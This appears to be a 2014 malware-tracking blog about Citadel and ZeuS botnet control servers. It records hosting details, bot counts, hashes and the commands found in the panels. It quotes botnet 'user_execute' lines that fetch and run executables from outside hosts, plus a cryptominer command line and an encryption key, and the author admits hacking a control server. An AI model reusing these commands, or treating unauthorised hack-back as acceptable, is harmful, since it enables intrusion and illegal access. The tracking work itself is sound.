Monday, May 26, 2014

hsbconlineuk.com Citadel/Zeus Service

Citadel and Zeus control panels were posted on Cybercrime-Tracker. 
I'm on holiday today (thanks troops), and this server is hosted in America (not on my watch), so I'll take a look at it. 

I observed this C&C on May 26th. According to log files, it had been operating since at least March 30th 2014 

hsbconlineuk.com. 14400 IN A 198.176.28.49

NetRange:       198.176.28.0 - 198.176.31.255
CIDR:           198.176.28.0/22
OriginAS:       AS46785
NetName:        QUASAR-DATA-CENTER
NetHandle:      NET-198-176-28-0-1
Parent:         NET-198-0-0-0-0
NetType:        Direct Allocation

The panels were mixed variety of Citadel and ZeuS, in the 'images' directory:

Looks like Nigerian names


After I contacted the NOC and abuse emails, I hacked the server and was going through the control panels taking screenshots, gathering evidence.


hxxp://hsbconlineuk.com/images/ada/cp.php
94 bots



Seemed like a pretty boring setup, but it started acting odd.



Then I got a funny message:




Awesome. 



Details

ala/cp.php
93 bots

BuckC
57 bots

Ebuka
0 bots

ija
33 bots




Other:
.contactemail 
cushlilly@gmail.com
.lastlog
37.221.161.234
inetnum: 37.221.161.232 - 37.221.161.239
netname: FVDE
descr: Tor Exit Node Hosting
country: RO

That contact email is a known 419 scammer.

Zenith Bank (fake bank)
http://db.aa419.org/fakebanksview.php?key=82051

http://bgp.he.net/dns/merchantspeedaircourier.com#_whois

http://www.whoismind.com/whois/franchiseclearing-exchange.com.html


Friday, May 9, 2014

saudeodontos.com.br - Citadel

Citadel botnet C&C server listed on ZeuS Tracker

https://zeustracker.abuse.ch/monitor.php?host=saudeodontos.com.br

saudeodontos.com.br
200.98.246.214
inetnum:     200.98/16
aut-num:     AS15201
abuse-c:     SEO50
owner:       Universo Online S.A.
ownerid:     001.109.184/0001-95
responsible: Contato da Entidade UOL
country:     BR




Login:


Home 
(132 bots)







Scripts
user_execute hxxp://hopper.nl/images/2014/1/droper.exe
user_execute hxxp://hopper.nl/images/2014/1/1.exe


https://malwr.com/analysis/MWYyOGZkYTA0N2FhNDE4YmI4NjljZGU5Nzc0Mjc3Yjc/
https://malwr.com/analysis/ZjJmZWU0NzNhNDZlNDdlZDhlNTRlYzBjYzEzNzY1ODM/



Encryption Key:
78fghrYU%^&$ER

Same encryption key observed here:
http://protectyournet.blogspot.com/2014/05/saudevitalsuplementoscom-citadel.html

saudevitalsuplementos.com - Citadel

Citadel botnet
https://zeustracker.abuse.ch/monitor.php?host=www.saudevitalsuplementos.com


saudevitalsuplementos.com
200.98.197.107
aut-num:     AS15201
abuse-c:     SEO50
owner:       Universo Online S.A.


Login:



Home:
(15 bots)



Scripts:




Scripts :
user_execute hxxp://ozibiza.com/plugins/editors/codemirror/pics/musics/musicse.exe
user_execute hxxp://ozibiza.com/plugins/editors/codemirror/pics/imgs/setup.exe

https://malwr.com/analysis/MGU3OWU5MmIwYjkzNGY4MzkxYjQxZjUyODljMTFkZjA/
https://malwr.com/analysis/ZWU1NTM2NTZhOTI2NDQwZTk5ZTQ2YmM3NjJjNzQ0NDk/


b6e0e6bf92456476d0d1d813274192b0 
drops this: 8FEE9A2354B3646A94DAEDB08B731DDA  
(this binary has code for a miner found here: http://ufasoft.com/coin/) 
Command line:C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\vbc.exe -o http://super777.truemyenergy:x@dog.ltcoin.net:8016 -t 3 -T 83 -a scrypt -g no -I 0

cf9ea8b950fce64b5f37212f1d34e3fd (VT 35/50)


These MD5s are all over.
Russian file names like "VKontakte" (Russian Facebook)


Encryption Key:
78fghrYU%^&$ER

Same encryption key observed here:
http://protectyournet.blogspot.com/2014/05/saudeodontoscombr-citadel.html